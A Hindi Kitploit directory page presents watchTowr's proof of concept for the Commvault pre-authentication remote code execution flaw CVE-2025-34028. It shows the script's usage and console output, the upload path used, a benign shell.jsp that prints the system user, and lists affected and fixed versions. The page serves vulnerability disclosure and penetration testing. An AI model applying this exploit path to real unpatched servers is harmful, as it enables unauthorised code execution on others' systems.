Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028 | Kitploit
उपकरण/GitHubGitHub/watchtowrlabs/watchtowr-vs-commvault-preauth-rce-cve-2025-34028
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubwatchtowrlabs/watchtowr-vs-commvault-preauth-rce-cve-2025-34028

watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
2191 साल पहलेKitploit द्वारा समीक्षित

CVE-2025-34028

कॉमवॉल्ट पूर्व-प्रमाणित रिमोट कोड निष्पादन प्रूफ ऑफ कॉन्सेप्ट

तकनीकी विवरण के लिए हमारा ब्लॉग पोस्ट देखें

क्रियान्वयन में पहचान

root@kitploit:~
 python watchtowr-vs-commvault-rce-CVE-2025-34028.py --url https://192.168.1.1
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchtowr-vs-commvault-rce-CVE-2025-34028.py
        (*) Commvault Unauthenticated Remote Code Execution (CVE-2025-34028) POC by watchTowr
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2025-34028]
        
[*] Targeting https://192.168.1.1
[*] Verifying presence of Commvault
[*] Uploading to  /reports/MetricsUpload/2GfMIJdK/
[*] Fetching System User from  https://192.168.1.1/reports/MetricsUpload/2GfMIJdK/.tmp/dist-cc/dist-cc/shell.jsp
[*] System User EC2XXX-XXXXXXX$

विवरण

यह स्क्रिप्ट Commvault वेब इंटरफेस के लिए CVE-2025-34028 का प्रूफ ऑफ कॉन्सेप्ट है। कोड निष्पादन .jsp फ़ाइल वाली एक ज़िप फ़ाइल अपलोड करके, ज़िप फ़ाइल एक सार्वजनिक निर्देशिका में अपलोड की जाती है और प्रतिक्रिया में सिस्टम उपयोगकर्ता का विवरण दिया जाता है। अधिक विवरण हमारे [ब्लॉग पोस्ट] (https://labs.watchtowr.com/) में वर्णित हैं।

नोट

PoC स्क्रिप्ट एक हार्डकोडेड ज़िप फ़ाइल का उपयोग करती है जिसमें निम्नलिखित फ़ाइलें होती हैं:

  • /ccApp/index.html
  • shell.jsp

Shell.jsp सामग्री:

root@kitploit:~
<%@ page import="java.util.*" %>
<html>
<body>
  <h3>System Information</h3>
  <p>Current User: <%= System.getProperty("user.name") %></p>
</body>
</html>

प्रभावित संस्करण

  • Commvault Windows और Linux 11.38.0 - 11.38.19

सुधारित संस्करण

  • Commvault Windows और Linux 11.38.20, 10 अप्रैल 2025 तक
  • Commvault Windows और Linux 11.38.25, 10 अप्रैल 2025 तक

अधिक विवरण के लिए Commvault Advisory देखें

watchTowr Labs का अनुसरण करें

नवीनतम सुरक्षा अनुसंधान के लिए watchTowr Labs टीम का अनुसरण करें

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
टूल डाउनलोड करें